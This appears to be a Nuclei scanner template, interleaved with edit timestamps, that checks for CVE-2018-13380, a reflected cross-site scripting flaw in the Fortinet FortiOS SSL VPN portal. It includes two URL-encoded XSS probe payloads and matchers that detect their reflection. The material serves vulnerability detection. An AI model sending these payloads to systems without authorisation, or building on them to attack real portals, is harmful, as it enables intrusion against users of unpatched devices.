2021-01-02 05:00:39 +00:00
id : CVE-2018-13380
2020-11-24 14:30:18 +00:00
info :
name : Fortinet FortiOS Cross-Site Scripting
2022-01-28 10:16:21 +00:00
author : shelld3v,AaronChen0
2020-11-24 14:30:18 +00:00
severity : medium
2022-04-22 10:38:41 +00:00
description : A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized
malicious script code via the error or message handling parameters.
2022-01-28 10:16:21 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2018-13380
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-13380
cwe-id : CWE-79
2022-01-28 10:16:21 +00:00
tags : cve,cve2018,fortios,xss,fortinet
2020-11-24 14:30:18 +00:00
requests :
- method : GET
path :
2022-01-28 10:16:21 +00:00
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
2021-06-29 02:17:42 +00:00
- "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
2020-11-24 20:00:01 +00:00
matchers-condition : and
2020-11-24 14:30:18 +00:00
matchers :
- type : word
2022-01-28 10:16:21 +00:00
part : body
2020-11-24 14:30:18 +00:00
words :
- "<svg/onload=alert(1337)>"
2022-01-28 10:16:21 +00:00
- "<script>alert(1337)</script>"
condition : or
2020-11-24 20:00:01 +00:00
- type : word
2022-01-28 10:16:21 +00:00
part : header
2020-11-24 20:00:01 +00:00
words :
- "application/json"
negative : true
- type : status
status :
2021-02-17 14:44:40 +00:00
- 200